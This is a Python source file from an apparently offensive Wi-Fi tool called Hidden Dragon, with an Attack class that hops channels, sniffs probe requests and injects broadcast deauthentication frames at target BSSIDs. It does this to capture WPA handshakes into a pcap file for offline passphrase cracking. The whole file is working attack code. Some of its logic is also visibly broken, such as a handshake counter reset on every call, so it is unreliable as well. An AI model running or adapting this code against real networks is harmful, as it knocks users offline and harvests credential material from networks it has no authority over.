f2c940ae37
Many changes performed in development of Hidden Dragon hdragon command is broken for development
# Copyright (c) 2024 Anoduck
#
# This software is released under the MIT License.
# https://opensource.org/licenses/MIT
import os
import subprocess
import threading
from random import choice
from time import sleep

import pandas as pd
from scapy.layers.dot11 import Dot11
from scapy.layers.dot11 import Dot11Deauth
from scapy.layers.dot11 import RadioTap
from scapy.layers.eap import EAPOL
from scapy.sendrecv import AsyncSniffer
from scapy.sendrecv import sendp
from scapy.utils import PcapWriter

from .dataframe import CtigerDataFrame
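class Attack:
    """Sniffing, channel-hopping and frame-injection routines for one interface.

    ``attack`` is the entry point; it stores the logger and interface on the
    instance, and the other methods read ``self.log`` from there.

    NOTE(review): the page this listing was taken from did not preserve
    indentation, so the nesting of every method body below is a
    reconstruction -- confirm it against the repository before relying on it.
    """

    def sniff_stop(self, pkt):
        """Append *pkt* to the capture file and report whether to stop.

        Passed as ``stop_filter`` to the sniffer created in ``feed_gather``.
        The module-level counter ``hndshk_frag`` is set to 0 at the start of
        every call, before the EAPOL check below runs.

        Every packet handed to this callback is written to
        ``ctiger_handshake.pcap`` in the current working directory, not only
        EAPOL frames. A capture that holds EAPOL key frames is enough for
        offline passphrase guessing against WPA/WPA2-PSK networks, so the file
        should be handled as credential material (restrictive permissions,
        short retention).

        Returns:
            True when the counter is 10 or more after the update, else None.
        """
        global hndshk_frag
        hndshk_frag = 0

        pktdmp = PcapWriter('ctiger_handshake.pcap', append=True, sync=True)
        try:
            pktdmp.write(pkt)
        finally:
            # One writer is opened per packet; close it explicitly instead of
            # leaving the file handle to garbage collection.
            pktdmp.close()

        if EAPOL in pkt:
            hndshk_frag += 1
        else:
            hndshk_frag = 0

        if hndshk_frag >= 10:
            hndshk_frag = 0
            return True

    def feed_gather(self, mon_dev, targ, lock):
        """Start a sniffer on *mon_dev* and inject two frames naming *targ*.

        While holding *lock*, each pass creates and starts an ``AsyncSniffer``
        with ``sniff_stop`` as its stop filter, then sends two management
        frames (subtype 4 and subtype 12), each carrying a ``Dot11Deauth``
        layer, addressed to broadcast with *targ* as both ``addr2`` and
        ``addr3``. The loop has no exit condition or delay in this method.

        Detection and mitigation: bursts of broadcast deauthentication frames
        are a standard wireless-IDS signature, and stations that negotiate
        802.11w Protected Management Frames discard unprotected
        deauthentication frames.

        Args:
            mon_dev: Interface name handed to scapy as ``iface``.
            targ: Value used for ``addr2`` and ``addr3`` of both frames.
            lock: Lock shared with ``chan_hopper``.
        """
        while True:
            with lock:
                fg_asf = AsyncSniffer(stop_filter=self.sniff_stop,
                                      iface=mon_dev, monitor=True)
                self.log.info('Starting pkt gather')
                fg_asf.start()
                # log.info('Setting mon_dev channel to ', channel)
                pkt = RadioTap()/Dot11(type=0, subtype=4,
                                       addr1="ff:ff:ff:ff:ff:ff",
                                       addr2=targ, addr3=targ)/Dot11Deauth()
                # The message is built up front: extra positional arguments
                # are not appended to the text by logging-style loggers.
                self.log.debug(f'sending deauth to {targ} with type 4')
                sendp(pkt, iface=mon_dev, verbose=0)
                pkt = RadioTap()/Dot11(type=0, subtype=12,
                                       addr1="ff:ff:ff:ff:ff:ff", addr2=targ,
                                       addr3=targ)/Dot11Deauth()
                self.log.debug(f'sending deauth to {targ} with type 12')
                sendp(pkt, iface=mon_dev, verbose=0)

    def grab_macs(self, pkt):
        """Return ``pkt.addr2`` for type 0 / subtype 4 frames, else None.

        Passed as the ``prn`` callback of the sniffer started in ``attack``.
        A frame is reported only when it has a ``Dot11`` layer, is a
        management frame of subtype 4 (probe request), and its ``info`` field
        compares unequal to the empty string.
        """
        if not pkt.haslayer(Dot11):
            return None
        if pkt.type == 0 and pkt.subtype == 4 and pkt.info != '':
            self.log.debug(f'mac: {pkt.addr2}')
            return pkt.addr2
        return None

    @staticmethod
    def _channel_command(mon_dev, chan):
        """Build the argv list that asks ``iw`` to tune *mon_dev* to *chan*.

        The interface name stays a single argv element, so characters a shell
        would interpret (``;``, ``&&``, spaces, ``$()``) have no effect.
        """
        return ['iw', 'dev', mon_dev, 'set', 'channel', str(chan)]

    def chan_hopper(self, mon_dev, channels, lock):
        """Retune *mon_dev* to a randomly chosen channel, forever.

        *channels* is de-duplicated and sorted, a ``','`` element is removed
        (``list.remove`` raises ValueError when none is present), and the
        remaining elements are converted with ``int``. Each pass then picks
        one channel while holding *lock*, runs ``iw`` and sleeps 14.7 seconds.

        Args:
            mon_dev: Interface name passed to ``iw dev``.
            channels: Iterable of channel values that includes a ``','``.
            lock: Lock shared with ``feed_gather``.
        """
        self.log.info('Channel hopper started.')
        chlist = list(set(channels))
        chlist.sort()
        chlist.remove(',')
        chans = [int(chan) for chan in chlist]
        while True:
            with lock:
                ichan = choice(chans)
                try:
                    # No shell is involved: the interface name reaches iw as
                    # data and cannot be parsed as extra commands. A non-zero
                    # exit status is ignored, as it was with os.system().
                    subprocess.run(self._channel_command(mon_dev, ichan),
                                   check=False)
                except OSError as err:
                    # os.system() never raised when iw was missing; keep the
                    # hop best-effort rather than ending the thread.
                    self.log.debug(f'iw could not be run: {err}')
                self.log.debug(f'Channel set to {ichan}')
                sleep(14.7)
                # return ichan

    def attack(self, mondev, scan_file, net_file, log):
        """Load the scan CSV, start sniffing and spawn the worker threads.

        Stores its arguments on the instance, reads *scan_file* with pandas,
        derives the unique ``channel`` and ``bssid`` values, and starts an
        ``AsyncSniffer`` on the interface with ``grab_macs`` as ``prn``. The
        loop that follows starts a ``chan_hopper`` thread on every pass and a
        ``feed_gather`` thread for each sniffer result row whose second
        element is found in the loaded DataFrame. The loop has no exit
        condition, and the threads it starts are never joined.

        Args:
            mondev: Interface name, stored as ``self.mon_dev``.
            scan_file: CSV path; columns ``crypt``, ``ssid``, ``channel`` and
                ``bssid`` are referenced.
            net_file: Stored as ``self.net_file``; not used in this method.
            log: Logger object, stored as ``self.log`` for the other methods.
        """
        self.log = log
        self.mon_dev = mondev
        self.scan_file = scan_file
        self.net_file = net_file
        log.info('Beginning Attack')
        targets = pd.read_csv(self.scan_file, index_col=0)
        tpairs = targets.drop(columns=['crypt', 'ssid'])
        pd_chan_list = tpairs.channel.to_list()
        channels = list(set(pd_chan_list))
        log.debug(f'Channel Type: {type(channels)}')
        pd_bssid_list = tpairs.bssid.to_list()
        bssids = list(set(pd_bssid_list))
        log.info(f'Channel list: {channels}')
        log.info(f'BSSID list: {bssids}')
        asniff = AsyncSniffer(iface=self.mon_dev,
                              prn=self.grab_macs,
                              monitor=True, store=False)
        asniff.start()
        log.info('Starting channel hopper')
        lock = threading.Lock()
        while True:
            ch_thread = threading.Thread(target=self.chan_hopper,
                                         name='chopper',
                                         args=(self.mon_dev, channels, lock))
            ch_thread.start()
            ares = asniff.results
            if ares is not None:
                for row in ares:
                    if row[1] in targets:
                        log.info(f'Found target: {row[1]}')
                        fg_thread = threading.Thread(
                            target=self.feed_gather,
                            name='feeder',
                            args=(self.mon_dev, row, lock))
                        fg_thread.start()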